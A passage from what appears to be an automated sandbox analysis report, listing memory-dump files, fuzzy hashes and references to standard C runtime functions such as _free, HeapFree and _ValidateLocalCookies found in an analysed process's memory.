                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a99b031b9c3b783a7708541daced083ab947d7423ff34a83daaf61e664b87ac9
                                                                                                                                                                                  • Instruction ID: fecfd42887ddb64f516c013084cb2bee27487f33fd8341a5df51512dc757fdb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: a99b031b9c3b783a7708541daced083ab947d7423ff34a83daaf61e664b87ac9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1441E56548EBD26FC7038BB45D72681BFB09E07200B8A05CBD4C4CB5E3E2484A2AC323
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                                                                                                                  • Instruction ID: cf6ac4abf9db281eb8a419ccfcc9db3c375e0f82ac27077ed6b363ed33fbee02
                                                                                                                                                                                  • Opcode Fuzzy Hash: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE08C32921628EBCB15DBD8C908D8AF3ECEB49F50B1100A6F511D3110C270DF00D7D0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 08771a0b77dad3b59c6d985b532b8b1774d28661f3e1825f7e483b4d546c059c
                                                                                                                                                                                  • Instruction ID: 9f3833eac30534b4b9ddd5b2aceeb816ad01e84643cd2326c88aa833ff69f8b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 08771a0b77dad3b59c6d985b532b8b1774d28661f3e1825f7e483b4d546c059c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE04632000508BFCF226F54DC0CB8D3BA8FB01355F000514FA2886231CB35EEA2EB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00C9CB70
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C726
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C738
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C74A
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C75C
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C76E
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C780
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C792
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C7A4
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C7B6
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C7C8
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C7DA
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C7EC
                                                                                                                                                                                    • Part of subcall function 00C9C709: _free.LIBCMT ref: 00C9C7FE
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CB65
                                                                                                                                                                                    • Part of subcall function 00C96601: HeapFree.KERNEL32(00000000,00000000,?,00C9477F,?,?,?,00C90924,00000000,?,E800CB10,00C8E3EC,?,00C81CB3,?,?), ref: 00C96617
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CB87
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CB9C
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CBA7
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CBC9
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CBDC
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CBEA
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CBF5
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CC2D
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CC34
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CC51
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9CC69
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _free$FreeHeap___free_lconv_mon
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 358854727-0
                                                                                                                                                                                  • Opcode ID: 1bcd4ea039f20513849577dc2f60eca2905a3a93c90bedf17265a0be91d18039
                                                                                                                                                                                  • Instruction ID: 2cd0237752e0fc5ca5e6078a856a8e4c0ed7d2f8e0b750d74a5cf1210ba47eb4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bcd4ea039f20513849577dc2f60eca2905a3a93c90bedf17265a0be91d18039
                                                                                                                                                                                  • Instruction Fuzzy Hash: 92313DB1604304DFEF21AAB9D88AB56B7E9EF01350F104429F4A9D6191DF31EE909B14
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C90A77
                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C90A7F
                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C90B08
                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C90B33
                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C90B88
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                  • API String ID: 1170836740-3733052814
                                                                                                                                                                                  • Opcode ID: 08389a66db207e079dc12a7aca34983b895c243b60c29f9b57287ea2a2ca0507
                                                                                                                                                                                  • Instruction ID: 8b1f19a8305a0824583a9ce43c44383f9042518367dc0a9b876d9a90e47bb4d6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 08389a66db207e079dc12a7aca34983b895c243b60c29f9b57287ea2a2ca0507
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F51F334A00249DFCF14DF68C849BAE7BB5BF45318F2481A9E8155B3A2C731DE41DB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LK$}{
                                                                                                                                                                                  • API String ID: 0-788974810
                                                                                                                                                                                  • Opcode ID: a7c256fc224d1423ad2239154f61857c0da82103b78e8fc7cc9bd7168a5b4fb0
                                                                                                                                                                                  • Instruction ID: b79a89f2fd0c787979f8152be23d55aed252f9337ebbb2e5b58b6721de7c72a3
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7c256fc224d1423ad2239154f61857c0da82103b78e8fc7cc9bd7168a5b4fb0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15C120B0A042499FDF15DF99C889BADBBB2BF49310F144159E910AB292D7309E41DBA2
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00C9C870: _free.LIBCMT ref: 00C9C895
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C8F6
                                                                                                                                                                                    • Part of subcall function 00C96601: HeapFree.KERNEL32(00000000,00000000,?,00C9477F,?,?,?,00C90924,00000000,?,E800CB10,00C8E3EC,?,00C81CB3,?,?), ref: 00C96617
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C901
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C90C
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C960
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C96B
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C976
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C981
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _free$FreeHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2929853658-0
                                                                                                                                                                                  • Opcode ID: 0fbcb49050ce11dcfb6e5c0c667bb6005878ef6b4cef3880ba9d3cff05b44e3f
                                                                                                                                                                                  • Instruction ID: c743115e9cc5a73f4d3fe08ef0b7e97fe8dc89373a8ea6f09001c948b4845d35
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fbcb49050ce11dcfb6e5c0c667bb6005878ef6b4cef3880ba9d3cff05b44e3f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62112471560704FADD21B7B1CC8FFCBB79D5F06B00F804825B299A60D2EB75F524A694
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C81F
                                                                                                                                                                                    • Part of subcall function 00C96601: HeapFree.KERNEL32(00000000,00000000,?,00C9477F,?,?,?,00C90924,00000000,?,E800CB10,00C8E3EC,?,00C81CB3,?,?), ref: 00C96617
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C831
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C843
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C855
                                                                                                                                                                                  • _free.LIBCMT ref: 00C9C867
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
